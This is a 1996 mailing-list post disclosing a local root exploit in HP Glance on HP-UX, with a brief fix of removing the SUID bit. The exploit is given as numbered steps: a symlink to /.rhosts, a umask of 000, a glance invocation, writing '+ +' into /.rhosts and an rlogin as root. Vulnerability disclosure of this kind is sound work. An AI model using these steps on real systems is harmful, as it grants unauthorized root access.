mailing list archives
Vunerability in HP Glance ?
From: jjacobi () nova umuc edu (John W. Jacobi)
Date: Mon, 23 Sep 1996 00:07:03 -0700
If this is out or old, I apologize.
Platform I exploited: HP 9000/700/HPUX9.05 & HP9000/800/HPUX9.04
Product I exploited: HP Glance version B.09.04
What I gained: root access in under a minute without the root password.
Subject: Creating a file as root, with world write permissions using HP
while not being root, or truncating any file on the system.
Problem: You could create /.rhosts , /etc/hosts.equiv , or whatever else
your heart desires
and then place arbitrary contents in it. Perhaps in the case of the
r-command files a + +
would suffice. Or you could truncate any file that root can.
Possible short term resolution: Remove the SUID-ROOT thing off of
How I exploited to get quick root access:
1. I logged in as my regular account.
2. I checked for a root .rhosts file, it did not exist.
3. I made a sym link called /tmp/tempfile to roots would be .rhosts file
ln -s /.rhosts /tmp/tempfile
4. I set my umask to 000:
5. I ran glance with the following command line:
glance -j 1 -f /tmp/tempfile -iterations 1
6. Thanks to glance the /.rhosts file suddenly appeared and was mode
7. Next I typed (I could have vi'ed or something as well):
echo "+ +" > /.rhosts
rlogin localhost -l root
9. And, not surprisingly, I was logged in as root.
Of course a little C program would be nice to automate this, but what if
compiler is not installed ? You might still want to be root, wouldnt
Question: Since there seems to be many of these little beasties in
does anyone know if the problem is of a single source, or just a lot of
Any feedback would be greatly appreciated...
John W. Jacobi
- Vunerability in HP Glance ? John W. Jacobi (Sep 23)